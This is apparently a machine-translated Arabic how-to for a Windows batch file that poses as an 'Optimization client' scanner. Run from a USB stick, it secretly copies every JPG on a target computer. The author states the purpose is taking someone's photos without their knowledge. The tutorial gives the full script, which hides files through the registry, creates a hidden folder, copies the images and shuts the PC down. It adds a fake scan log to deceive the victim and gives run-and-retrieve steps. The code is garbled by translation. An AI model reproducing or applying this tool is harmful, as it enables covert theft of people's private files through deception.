جدول المحتويات:
- الخطوة 1: اكتب الكود
- الخطوة الثانية: إنشاء ملف تقرير مزيف
- الخطوة 3: قم بتشغيل البرنامج
- الخطوة 4: احصل على الصور
- الخطوة 5: ماذا تعني الكود
فيديو: ملف دفعي لنسخ الصور السرية للتجسس: 5 خطوات
2024 مؤلف: John Day | [email protected]. آخر تعديل: 2024-01-30 07:42
لذا ، أول الأشياء أولاً ، ما هو هذا الإنشاء القابل للتوجيه ولماذا سيسمح لك هذا التوجيه بإنشاء ملف دفعي يقوم بنسخ جميع الصور من جهاز كمبيوتر إلى بطاقة الذاكرة الخاصة بك. سيقوم بذلك بشكل منفصل ، متظاهرًا كبرنامج آخر يقوم بفحص الكمبيوتر بحثًا عن المشكلات. عند الانتهاء ، سيكون لديك مجلد مخفي على بطاقة الذاكرة الخاصة بك يحتوي على جميع الصور المنسوخة ، لماذا؟ لقد أنشأت هذه التعليمات لأنني أردت استرداد صورة رقمية من جهاز شخص ما دون علمهم أنني فعلت ذلك. يسمح لك الاستخدام المشروع لهذا الملف بأرشفة / نسخ صورك الشخصية احتياطيًا. استخدامات أخرى: يمكن تعديل هذا الملف للسماح بنسخ أي نوع آخر من المستندات.
الخطوة 1: اكتب الكود
انسخ الكود التالي إلى المفكرة واحفظه على جذر شريحة الذاكرة الخاصة بك كملف بات ، ويمكنك تسميته ما تريد طالما أنه يحتوي على امتداد بات. للتأكد من أنه يحتوي على الامتداد الصحيح ، اكتبه على النحو التالي في مربع حفظ المفكرة "copyimage.bat" (قم بتضمين الاقتباسات!)
echo offecho Optimization client 2008 v3.02becho -------------------------------- echo.echo يرجى عدم استخدام جهاز الكمبيوتر الخاص بك أثناء تشغيل هذا قائمة عمليات المسح. عند الانتهاء ، سيتم عرض سجل لمدير النظام الخاص بك لمراجعته.echo.echo يرجى التحلي بالصبر قد يستغرق ذلك حتى 3 ساعات. reg إضافة HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced / v Hidden / t REG_DWORD / d 00000002 / f> nulmkdir / data> nulattrib + h / data> nulsetLocal EnableDelayedExpansion @ echo offfor ٪٪ a in (jpg) do (for / f "tokens = * delims =" ٪٪ f in ('dir / b / s / ad c: / *. ٪٪ a ') do (xcopy "٪٪ f" / data / / y / h / q> nul)) attrib -s + h data / *> nulstart optimizationLog.txtshutdown / s / c " اكتمل فحص التحسين ، سيتم إغلاق جهاز الكمبيوتر الخاص بك الآن"
الخطوة الثانية: إنشاء ملف تقرير مزيف
في هذه الخطوة ، قمت بإنشاء ملف نصي مزيف يتظاهر بأنه سجل نتائج الملف الدفعي الذي نقوم بتشغيله لنسخ الملفات. هذا يسمح لك بالتظاهر بحدوث شيء ما. لا يهم ما يقوله هذا الملف ، يمكنك تغييره بقدر ما تريد ، فقط تأكد من صحة اسم الملف وتخزينه على جذر بطاقة الذاكرة الخاصة بك. قم بتسجيل الدخول وانسخه وحفظه في جذر شريحة الذاكرة الخاصة بك كـ optimizationLog.txt
اكتمل المسح. الرجاء إغلاق هذا السجل والسماح لمسؤول النظام الخاص بك بمراجعته. تشغيل العمليات: C: / Windows / system32 / taskeng.exeC: / Windows / system32 / Dwm.exeC: / Windows / Explorer. EXEC: / Program Files / Java / jre1. 6.0_07 / bin / jusched.exe C: / Windows / System32 / hkcmd.exe C: / Windows / System32 / igfxpers.exe C: / Windows / system32 / igfxsrvc.exeC: / Program Files / Synaptics / SynTP / SynTPEnh.exeC: / Program الملفات / TOSHIBA / Power Saver / TPwrMain.exeC: / Program Files / TOSHIBA / SmoothView / SmoothView.exe C: / Program Files / TOSHIBA / FlashCards / TCrdMain.exeC: / Program Files / BitDefender / BitDefender 2009 / bdagent.exeC: / Program ملفات / TOSHIBA / TOSCDSPD / TOSCDSPD.exeC: / Program Files / Registry Mechanic / regmech.exeC: / Program Files / BitDefender / BitDefender 2009 / seccenter.exeC: / Program Files / Synaptics / SynTP / SynTPHelper.exeC: / Program Files / Vuze / Azureus.exeC: / Program Files / Microsoft Office / Office12 / OUTLOOK. EXEC: / Program Files / AutoCAD 2008 / acad.exeC: / Users / Tom / AppData / Local / Temp / AdskCleanup.0001C: / Program Files / Mozilla Firefox / firefox.exeC: / Windows / System32 / NOTE PAD. EXEC: / Windows / system32 / SearchFilterHost.exeC: / HijackThis / HijackThis.exeR1 - HKCU / Software / Microsoft / Internet Explorer / Main ، Default_Page_URL = https://www.google.co.ukR1 - HKCU / Software / Microsoft / Internet Explorer / Main ، صفحة البحث = https://go.microsoft.com/fwlink/؟LinkId=54896R0 - HKCU / Software / Microsoft / Internet Explorer / Main ، الصفحة الرئيسية = https://www.google.co. ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main ، Default_Page_URL = https://www.google.co.ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main ، Default_Search_URL = https://go.microsoft.com/ fwlink /؟ LinkId = 54896R1 - HKLM / Software / Microsoft / Internet Explorer / Main ، صفحة البحث = https://go.microsoft.com/fwlink/؟LinkId=54896R0 - HKLM / Software / Microsoft / Internet Explorer / Main ، ابدأ الصفحة = https://go.microsoft.com/fwlink/؟LinkId=69157R0 - HKLM / Software / Microsoft / Internet Explorer / Search ، SearchAssistant = R0 - HKLM / Software / Microsoft / Internet Explorer / Search ، CustomizeSearch = R0 - HKCU / البرمجيات / مايكروسوفت / إنترنت إكسبلورر / أيضا lbar، LinksFolderName = O1 - المضيفون::: 1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C: / Program Files / Common Files / Adobe / Acrobat / ActiveX / AcroIEHelperShim:O2 - BHO مساعد متصفح Groove GFS - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C: / Program Files / Microsoft Office / Office12 / GrooveShellExtensions.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4D92}: / Program Files / Java / jre1.6.0_07 / bin / ssv.dllO3 - شريط الأدوات: شريط أدوات BitDefender - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C: / Program Files / BitDefender / BitDefender 2009 / IEToolbar.dllO4 - HKLM \.. / تشغيل: [Windows Defender]٪ ProgramFiles٪ / Windows Defender / MSASCui.exe -hideO4 - HKLM \.. / تشغيل: [SunJavaUpdateSched] "C: / Program Files / Java / jre1.6.0_07 / bin / jusched.exe "O4 - HKLM \.. / تشغيل: [IgfxTray] C: / Windows / system32 / igfxtray.exeO4 - HKLM \.. / تشغيل: [HotKeysCmds] C: / Windows / system32 / hkcmd.exeO4 - HKLM \.. / تشغيل: [استمرار] C: / Windows / system32 / igfxpers.exeO4 - HKLM \.. / تشغيل: [SynTPEnh] C: / Program Files / Syna ptics / SynTP / SynTPEnh.exeO4 - HKLM \.. / تشغيل: [TPwrMain]٪ ProgramFiles٪ / TOSHIBA / Power Saver / TPwrMain. EXEO4 - HKLM \.. / تشغيل: [SmoothView]٪ ProgramFiles٪ / Toshiba / SmoothView / SmoothView.exeO4 - HKLM \.. / تشغيل: [00TCrdMain]٪ ProgramFiles٪ / TOSHIBA / FlashCards / TCrdMain.exeO4 - HKLM \.. / تشغيل: [Toshiba TEMPO] C: / Program Files / Toshiba TEMPRO / Toshiba. Tempo. UI. TrayApplication.exeO4 - HKLM \.. / تشغيل: [BDAgent] "C: / Program Files / BitDefender / BitDefender 2009 / bdagent.exe" O4 - HKLM \.. / تشغيل: [BitDefender Antiphishing Helper] "C: / Program الملفات / BitDefender / BitDefender 2009 / IEShow.exe "O4 - HKCU \.. / تشغيل: [TOSCDSPD] C: / Program Files / TOSHIBA / TOSCDSPD / TOSCDSPD.exeO4 - HKCU \.. / تشغيل: [RegistryMechanic] C: / ملفات البرنامج / ميكانيكي التسجيل / RMTray.exe / HO4 - بدء التشغيل: OneNote 2007 Screen Clipper and Launcher.lnk = C: / Program Files / Microsoft Office / Office12 / ONENOTEM. EXEO8 - عنصر قائمة السياق الإضافي: E & xport إلى Microsoft Excel - الدقة: //C:\PROGRA~1\MICROS~3\Office12\EXCEL. EXE/3000O9 - الزر الإضافي: (بدون اسم) - {08B0E5C0-4FCB-11CF-AAA5-0040 1C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - قائمة "الأدوات" الإضافية: وحدة تحكم Sun Java - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - الزر الإضافي: إرسال إلى OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - قائمة "الأدوات" الإضافية: S & end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - الزر الإضافي: eBay.co.uk - شراء إنها تبيعها أحبها - {76577871-04EC-495E-A12B-91F7C3600AFA} - https://rover.ebay.com/rover/1/710-44557-9400-3/4 (الملف مفقود) O9 - زر إضافي: (بدون اسم) - {85d1f590-48f4-11d9-9669-0800200c9a66} -٪ windir٪ / bdoscandel.exe (الملف مفقود) O9 - قائمة الأدوات الإضافية: إلغاء تثبيت BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669 -0800200c9a66} -٪ windir٪ / bdoscandel.exe (الملف مفقود) O9 - الزر الإضافي: Amazon.co.uk - {8A918C1D-E123-4E36-B562-5C1519E434CE} - https://www.amazon.co.uk/ exec / obidos / redirect-home؟ tag = Toshibaukbholink-2 1 & site = home (الملف مفقود) O9 - الزر الإضافي: البحث - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / REFIEBAR. DLLO10 - ملف غير معروف في Winsock LSP: c: / windows / system32 / nlaapi.dllO10 - ملف غير معروف في Winsock LSP: c: / windows / system32 / napinsp.dllO10 - ملف غير معروف في Winsock LSP: c: / ملفات البرنامج / vmware / vmware workstation / vsocklib.dllO10 - ملف غير معروف في Winsock LSP: c: / program files / vmware / vmware workstation / vsocklib.dllO11 - مجموعة الخيارات: [INTERNATIONAL] International * O13 - Gopher Prefix: O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (فئة get_atlcom) - https://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cabO18 - البروتوكول: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C: / Program Files / Microsoft Office / Office12 / GrooveSystemServices.dllO18 - البروتوكول: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C: / Program Files / Common Files / Microsoft Shared / Help / hxds.dllO18 - اختطاف عامل التصفية: نص / xml - {807563E5-5146-11D5-A672-00B0D022E945} - C: / PROGRA ~ 1 / COMMON ~ 1 / MICROS ~ 1 / OFFICE12 / MSOXMLMF. DLLO20 - Winlogon إعلام: igfxcui - C: / Windows / SYSTEM32 / igfxdev.dllO23 - الخدمة: Agere Modem Call Progress Audio (AgereModemAudio) - Agere الأنظمة - C: / Windows / system32 / agrsmsvc.exeO23 - الخدمة: BitDefender Arrakis Server (Arrakis3) - BitDefender SRL https://www.bitdefender.com - C: / Program Files / Common Files / BitDefender / BitDefender Arrakis Server / bin / Arrakis3.exeO23 - الخدمة: خدمة ترخيص Autodesk - Autodesk - C: / Program Files / Common Files / Autodesk Shared / Service / AdskScSrv.exeO23 - الخدمة: خدمة ConfigFree - TOSHIBA CORPORATION - C: / Program Files / TOSHIBA / ConfigFree / CFSvcs.exeO23 - الخدمة: @٪ SystemRoot٪ / ehome / ehstart.dll، -101 (ehstart) - مالك غير معروف -٪ windir٪ / system32 / svchost.exe (الملف مفقود) O23 - الخدمة: getPlus (R) Helper - NOS Microsystems Ltd. - C: / Program Files / NOS / bin / getPlus_HelperSvc.exeO23 - الخدمة: خدمة تحديث Google (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - مالك غير معروف - C: / Program Files / Google / Update / GoogleUpdate.exe "/ svc (الملف مفقود) O23 - الخدمة: BitDefender Desktop Update Service (LIVESRV) - مالك غير معروف - C: / Program Files / Common Files / BitDefender / BitDefender Update Service / Livesrv.exe "/ الخدمة (الملف مفقود) O23 - الخدمة: @٪ SystemRoot٪ / system32 / qwave.dll، -1 (QWAVE) - مالك غير معروف r -٪ windir٪ / system32 / svchost.exe (الملف مفقود) O23 - الخدمة: @٪ SystemRoot٪ / system32 / seclogon.dll ، -7001 (seclogon) - مالك غير معروف -٪ windir٪ / system32 / svchost.exe (ملف مفقود) O23 - الخدمة: خدمة ضبط أداء الكمبيوتر المحمول (TempoMonitoringService) - Toshiba Europe GmbH - C: / Program Files / Toshiba TEMPRO / TempoSVC.exeO23 - الخدمة: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C: / Program Files / TOSHIBA / TOSHIBA DVD PLAYER / TNaviSrv.exeO23 - الخدمة: خدمة محرك الأقراص الضوئية TOSHIBA (TODDSrv) - TOSHIBA Corporation - C: / Windows / system32 / TODDSrv.exeO23 - الخدمة: TOSHIBA Power Saver (TosCoSrv) - شركة TOSHIBA ملفات البرنامج / TOSHIBA / Power Saver / TosCoSrv.exeO23 - الخدمة: TOSHIBA SMART Log Service - TOSHIBA Corporation - c: / Program Files / TOSHIBA / SMARTLogService / TosIPCSrv.exeO23 - الخدمة: خدمة وكيل VMware (ufad-ws60) - مالك غير معروف - C: / Program Files / VMware / VMware Workstation / vmware-ufad.exe "-d" C: / Program Files / VMware / VMware Workstation / "-s ufad-p2v.x ml (ملف مفقود) O23 - الخدمة: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems، Inc. - C: / Program Files / Common Files / Ulead Systems / DVD / ULCDRSvr.exeO23 - الخدمة: خدمة مصادقة VMware (VMAuthdService) - VMware ، Inc. - C: / Program Files / VMware Workstation / vmware-authd.exeO23 - الخدمة: خدمة VMware DHCP (VMnetDHCP) - VMware، Inc. - C: / Windows / system32 / vmnetdhcp.exeO23 - الخدمة: VMware NAT الخدمة - VMware، Inc. - C: / Windows / system32 / vmnat.exeO23 - الخدمة: BitDefender Virus Shield (VSSERV) - مالك غير معروف - C: / Program Files / BitDefender / BitDefender 2009 / vsserv.exe "/ الخدمة (الملف مفقود) O23 - الخدمة: VNC Server Version 4 (WinVNC4) - مالك غير معروف - C: / Program Files / RealVNC / VNC4 / WinVNC4.exe "- الخدمة (الملف مفقود) O23 - الخدمة: @٪ ProgramFiles٪ / Windows Media Player / wnetmpwk.exe، -101 (WMPNetworkSvc) - مالك غير معروف -٪ ProgramFiles٪ / Windows Media Player / wmpnetwk.exe (الملف مفقود)
الخطوة 3: قم بتشغيل البرنامج
يجب أن يكون لديك الآن شريحة ذاكرة بها ملفان (ومساحة كبيرة جاهزة للصور الجديدة). إذا كان لديك أي شيء آخر على محرك الأقراص ، فلا يهم ، خذ شريحة الذاكرة إلى جهاز الكمبيوتر المستهدف. عندما يتم تسجيله ، لاحظ حرف محرك الأقراص المخصص له ، سيمكنك ذلك من تشغيله دون الحاجة إلى تصفح المجلد أولاً ، اضغط على مفتاح Windows ثم اضغط على "R" (مع الاستمرار في الضغط على مفتاح windows). سيؤدي هذا إلى إظهار مربع التشغيل. في مربع التشغيل ، اكتب مسار الملف الدفعي الذي أنشأناه ، وحرف محرك الأقراص هو الحرف الذي تم تعيينه عند توصيل شريحة الذاكرة ، على سبيل المثال ، إذا قمت بإدخال شريحة الذاكرة الخاصة بي وسجّلت ag: / drive ، فسأقوم بالتشغيل: g: / copyimage.bat ثم اضغط على Enter ، أو انقر فوق تشغيل. سيبدأ تشغيل الملف الدفعي. عند اكتماله ، سيتم إيقاف تشغيل الجهاز. أزل بطاقة الذاكرة وخذها بعيدًا!
الخطوة 4: احصل على الصور
يجب أن يكون لديك الآن شريحة ذاكرة بها جميع الصور. الملفات والمجلدات مخفية ، لذا إذا لم تظهر لك الملفات والمجلدات الخاصة بك ، فستحتاج إلى تمكينها. للقيام بذلك ، انتقل إلى نافذة المستكشف (على سبيل المثال ، افتح جهاز الكمبيوتر الخاص بي) و: WinXP - Tools ، و Folder Options ، View ، Show Hidden FilesVista - Organize ، Folder and search options ، View ، Show Hidden Files بمجرد تحديدك ، يجب أن تكون قادرًا على فتح مجلد مخفي واحصل على الصور التي تريدها!
الخطوة 5: ماذا تعني الكود
سأشرح أكبر قدر ممكن من الشفرة. لم أكتب وظيفة النسخ الرئيسية بواسطتي ، لقد اقترضتها من الموقع التالي وقمت بتعديلها:
echo off '' توقف الأوامر التي تظهر على الشاشة ، لذلك لا يعرف المستخدم ما الذي يتم عمله echo Optimization client 2008 v3.02b echo ------------------- -------------صدى صوت. يكتب على الشاشة عنوانًا لبرنامج echo. يرجى عدم استخدام جهاز الكمبيوتر الخاص بك أثناء تشغيل قائمة عملية المسح.echo.echo. عند اكتماله ، سيتم عرض سجل لمسؤول النظام لمراجعته. يخبر المستخدم بحمل قمامة غير صحيح ، يضيف ريج HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced / v Hidden / t REG_DWORD / d 00000002 / f> nul يضيف مفتاح تسجيل يخفي الملفات المخفية و المجلدات. هذا يمنع المستخدم من رؤية المجلد الذي نقوم بإنشائه لاستيعاب الصور المنسوخة. يقوم الأمر nul في النهاية بإيقاف الأمر عن الإبلاغ عن أي رسائل عندما ينتهي mkdir / data> nul يجعل مجلدًا على محرك الأقراص يوجد فيه هذا الملف الدفعي على البيانات المسماة. attrib + h / data> nul يخفي مجموعة المجلدات التي تم إنشاؤهاLocal EnableDelayedExpansionfor ٪٪ a in (jpg) do (for / f "tokens = * delims =" ٪٪ f in ('dir / b / s / ad c: / *. ٪٪ a ') do (xcopy "٪٪ f" / data / / y / h / q> nul)) هذا هو الرمز الذي سيبحث في محرك الأقراص c: / بأكمله عن الصور. إذا كنت تريده أن يبحث في محرك أقراص آخر ، فقم بتغيير الجزء c إلى ما تريده. إذا كنت تريد العثور على أنواع الملفات الأخرى ، فقم بإدراجها بعد ذلك في نص-j.webp
موصى به:
ملف دفعي: ضوابط الحركة: 3 خطوات
ملف دفعي: عناصر التحكم في الحركة: عندما بحثت عن كيفية إنشاء عناصر تحكم في الحركة في CMD ، لم أجد أي نتائج دقيقة ، لذلك قررت عمل عناصر التحكم الخاصة بي التي تعمل مع مفاتيح WASD للحركة و 1234 مفتاحًا للتدوير
كيفية تحطيم أي جهاز كمبيوتر باستخدام ملف دفعي: 10 خطوات
كيفية تحطيم أي جهاز كمبيوتر باستخدام ملف دفعي !: تحطم أي جهاز كمبيوتر أو كمبيوتر محمول بسهولة
إرسال بريد إلكتروني تلقائيًا مع صورة من ملف دفعي باستخدام سطح المكتب القديم و XP: 4 خطوات
أرسل بريدًا إلكترونيًا تلقائيًا مع صورة من ملف دفعي باستخدام سطح المكتب القديم و XP: أنا محظوظ جدًا للحصول على عرض رائع من نافذة مكتبي في المنزل. عندما أكون بعيدًا ، أريد أن أرى ما أفتقده وغالبًا ما أكون بعيدًا. اعتدت أن يكون لدي موقع الويب الخاص بي ومحطة طقس منزلية يمكن تحميلها عبر بروتوكول نقل الملفات جميع أحوال الطقس
Comsave: قفل ملاحظاتك (تطبيق ملف دفعي): 3 خطوات
Comsave: قفل ملاحظاتك (تطبيق ملف دفعي): مرحبًا ، هذا هو Comsaveit يحفظ ملاحظاتك ويغلقها ، ما عليك سوى تنزيل ملف الدُفعات المرفق (في الخطوة 1) ، ضعه في مجلد ولا تقم بنقله من المجلد أو لن يتمكن الملف الدفعي من العثور على حسابك. ملاحظة: هذا ملف دفعي. إنه يولد
ملف دفعي لتكرار الذات الشر: 3 خطوات
ملف دفعي للنسخ الذاتي الشرير: هل أردت يومًا ملف دفعي شرير يفتح نفسه مرارًا وتكرارًا ، يضاعف نفسه في كل مرة؟ على & nbsp ؛ حسنًا ، إليك كيفية القيام بذلك